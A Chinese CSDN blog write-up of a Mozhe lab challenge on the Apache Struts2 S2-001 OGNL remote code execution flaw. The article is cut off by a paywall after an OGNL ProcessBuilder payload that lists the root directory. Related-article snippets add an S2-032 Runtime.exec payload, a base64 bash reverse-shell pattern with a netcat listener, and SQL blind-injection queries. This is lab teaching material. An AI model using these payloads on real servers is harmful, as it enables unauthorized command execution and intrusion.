墨者靶场 初级:Struts2远程代码执行漏洞(S2-001)

最新推荐文章于 2024-04-24 10:33:50 发布
最新推荐文章于 2024-04-24 10:33:50 发布
阅读量486 收藏
点赞数
分类专栏: 靶场实战 文章标签: 安全 渗透 struts2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43233085/article/details/103973786
版权
该博客介绍了安全工程师在授权扫描中发现的Apache Struts2框架可能存在的远程代码执行漏洞(S2-001)。实训目标包括了解Struts2框架,理解S2-004目录遍历漏洞,并学习其利用方法。通过访问靶场并执行特定的OGNL表达式验证了漏洞存在,接着利用漏洞执行ls/命令查看文件,并成功读取到key.txt的内容,完成解题过程。
摘要由CSDN通过智能技术生成

墨者靶场 初级:Struts2远程代码执行漏洞(S2-001)

题目

在这里插入图片描述

背景介绍

某日,安全工程师"墨者"对一单位业务系统进行授权扫描,在扫描过程中,发现了某个业务系统使用Apache Struts2框架。不知道运维人员是否修补了漏洞。

实训目标

1、了解Apache Struts2框架;
2、了解Apache Struts2目录遍历漏洞(S2-004);
3、了解Apache Struts2目录遍历漏洞利用方法;

解题方向

验证Apache Struts2目录遍历漏洞(S2-001)。

解题步骤

启动靶场,打开链接访问,是一个信息显示页面。
在这里插入图片描述
底下有个S2-001的参考链接,去欣赏一下。
在这里插入图片描述
可以看出漏洞原理: 用户提交表单时,后端会将OGNL表达式%{value}进行解析。

输入%{1+1}测试一下,被执行了,漏洞存在。
在这里插入图片描述
在这里插入图片描述
那接下来执行ls/命令,查看文件情况。

%{
   
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{
   "ls","/"}))
最低0.47元/天 解锁文章
CNwanku
关注
专栏目录
墨者靶场 初级Struts2远程代码执行漏洞S2-016)
qq_43233085的博客
01-13 721
墨者靶场 初级: Apache Struts2远程代码执行漏洞题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 某日安全工程师"墨者"对一单位业务系统进行授权扫描,在扫描过程,发现了某个业务系统使用Apache Struts2框架。并且该版本存在高危漏洞,不知道运维人员是否修补了漏洞。 实训目标 1、了解Apache Struts2框架; 2、了解Apache Struts2远程代码执行...
Apache Struts2远程代码执行漏洞(S2-001)复现
qq_36933272的博客
09-01 833
根据参考链接,密码框输入%(1+1)验证是否存在S-2001漏洞,用户名任意 回显2,存在漏洞,网上寻找poc,ls查看根目录下的文件,发现key.txt%{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{“ls”,"/"})).redirectErrorStream(true).start(), #b=#a.getInputStr...
vulhub靶场struts2漏洞复现
weixin_44300286的博客
03-06 2474
0x01、S2-001远程代码执行漏洞 原理 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 影响版本 Struts 2.0.0 - Struts 2.0.8 poc 执行任意命令 %{#a=(new java.lan
vulfocus 靶场struts2 代码执行CVE-2020-17530)
最新发布
没有故事
04-24 960
由于Struts2 会对某些标签属性(比如 id) 的属性值进行二次表达式解析,因此当这些标签属性使用了 %{x} 且 x 的值用户可控时,用户即可构造一些SSRF、远程命令执行等形式的payload,并将这些恶意payload以%{...}形式传入该标签属性, 即可造成OGNL表达式执行。bash -c {echo,编码后的内容} |{base64 ,-d}|{bash , -i} #或: 抓包,改为如下内容: 红色部分为要更改的地方。监听机进行监听:nc -lvvp。
在线靶场-墨者-命令执行2星-Apache Struts2远程代码执行漏洞(S2-016)复现
weixin_42079912的博客
07-18 662
使用Struts2工具进行扫描,验证漏洞得出有S2-045和S2-046漏洞 进行直接应用,把漏洞编号更改为S2-046,在Struts2工具的命令执行输入cat /key.exe然后点击执行,即可获得key ...
墨者靶场 初级Struts2远程代码执行漏洞S2-004)
qq_43233085的博客
01-14 889
墨者靶场 初级Struts2远程代码执行漏洞S2-004)题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 某日安全工程师"墨者"对一单位业务系统进行授权扫描,在扫描过程,发现了某个业务系统使用Apache Struts2框架。不知道运维人员是否修补了漏洞。 实训目标 1、了解Apache Struts2框架; 2、了解Apache Struts2目录遍历漏洞(S2-004); 3、...
墨者靶场 Apache Struts2远程代码执行漏洞(S2-013)复现
曹振国的博客
06-17 326
漏洞详情: 关于漏洞详情可以查看这篇文章:S2-013 struts2的标签 <s:a> 和 <s:url> 都有一个 includeParams 属性,可以设置成如下值: 1. none - URL不包含任何参数(默认) 2. get - 仅包含URL的GET参数 3. all - 在URL包含GET和POST参数 当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参数上。 此时<s:a> 或<s:ur
墨者学院-Apache Struts2远程代码执行漏洞(S2-015)复现
JimWu的博客
09-04 2037
Apache Struts2远程代码执行漏洞(S2-015)复现 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器 漏洞原理: 如果一个请求与任何其他定义的操作不匹配,它将被匹配,*并且所请求的操作名称将用于以操作名称加载JSP文件。并且,1作为OGNL表达式的威胁值,{ }可以在服务器端执行任意的Java代码。 1.打开靶场,测试是否存在漏洞。 输入/${1+1}.action...
s2-001远程代码执行漏洞
Stephen Wolf
11-13 1952
一、漏洞描述: 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行。 影响版本: ...
S2-001 远程代码执行漏洞
玄道的网安博客
06-27 164
前言 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 环境搭建 使用docker和vulhub搭建环境 cd vulhub/struts2/s2-001 docker-compose build&&.
struts2 漏洞
sccc0971的博客
12-29 242
s2_032 重现(调用服务器的计算器) 测试版本2.3.28 http://localhost/hehe.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]),1?%23xx:
S2-001漏洞靶场复现
qq_42947816的博客
02-07 454
1、漏洞描述 Struts2是一个基于MVC设计模式Web应用框架,它本质上相当于一个servlet,在MVC设计模式Struts2作为控制器(Controller)来建立模型与视图的数据交互。 WebWork 2.1+ 和 Struts 2 的'altSyntax'特性允许将 OGNL 表达式插入文本字符串并进行递归处理,这允许恶意用户提交一个字符串。如果用户提交表单验证失败,且提交的参数包含一个 OGNL 表达式,服务器将执行该表达式。 2、影响版本 WebWork 2.1 (with..
墨者学院-Apache Struts2远程代码执行漏洞(S2-001)复现
JimWu的博客
09-04 451
Apache Struts2远程代码执行漏洞(S2-001)复现 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器 漏洞原理: 用户提交表单时,后端会将OGNL表达式%{value}进行解析。 1.打开靶场,出现登录界面。 2.测试输入框是否存在漏洞。 输入%{1+1} 3.执行了表达式,证明存在漏洞。 4.执行ls/查看文件。 输入%{ #a=(new java.lang....
buuctf [struts2]s2-001
qq_1873822的博客
03-16 641
漏洞原理 Struts 2 框架的表单验证机制( Validation )主要依赖于两个拦截器:validation 和 workflow。validation 拦截器工作时,会根据 XML 配置文件来创建一个验证错误列表;workflow 拦截器工作时,会根据 validation 拦截器所提供的验证错误列表,来检查当前所提交的表单是否存在验证错误。 在默认配置下,如果 workflow 拦截器检测到用户所提交的表单存在任何一个验证错误,workflow 拦截器都会将用户的输入进行解析处理,随即返回并显示
360众测靶场题库之20-Apache Struts2远程代码执行漏洞(S2-013)
zjl12344的博客
03-07 193
360众测靶场题库
[struts2]s2-001
satasun的博客
12-09 254
[struts2]s2-001 环境搭建 Github buuctf poc 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 测试一下: exp 获取Tomcat执行路径: %{@java.lang.Syste
Struts2_001_RCE 漏洞复现
ADummy的博客
02-04 433
Struts2_001_远程代码执行 by ADummy 0x00利用路线 ​ burpuite抓包—>修改payload—>重放包—>代码执行—>有回显 0x01漏洞介绍 ​ 我们来了解一下Struts2 的validation机制。validation依靠validation和workflow两个拦截器。validation会根据配置的xml文件创建一个特殊字段错误列表。而workflow则会根据validation的错误对其进行检测,如果输入有值,将会把用户带回到原先提
【研究】Struts2漏洞S2-001漏洞环境和POC
god_Zeo的安全博客
07-01 2231
【研究】Struts2漏洞S2-001漏洞环境和POC1.环境2.原理3.影响版本4.利用过程POC 1.环境 环境 https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md 这个搭环境很方便快捷,具体可以看说明,很简单 2.原理 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{v...
墨者靶场sql布尔盲注
10-09
针对墨者靶场的 SQL 布尔盲注,你需要先了解 SQL 注入的基本概念和实现方式。在进行布尔盲注时,需要通过构造特定的 SQL 语句来判断数据库是否存在某些数据或条件,从而实现注入攻击。以下是一些可能用到的注入语句: 1. 判断存在性:SELECT * FROM table WHERE column = 'value' and 1=1(存在)或 1=2(不存在) 2. 判断字段长度:SELECT * FROM table WHERE LENGTH(column) = n and 1=1(长度为 n)或 1=2(长度不为 n) 3. 判断字符内容:SELECT * FROM table WHERE ASCII(SUBSTRING(column, n, 1)) = c and 1=1(第 n 个字符的 ASCII 码为 c)或 1=2(第 n 个字符的 ASCII 码不为 c) 在使用布尔盲注时,需要不断地尝试不同的语句,并根据返回结果进行判断和推断。同时,需要注意防止误伤和误判,以免造成不必要的影响和损失。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值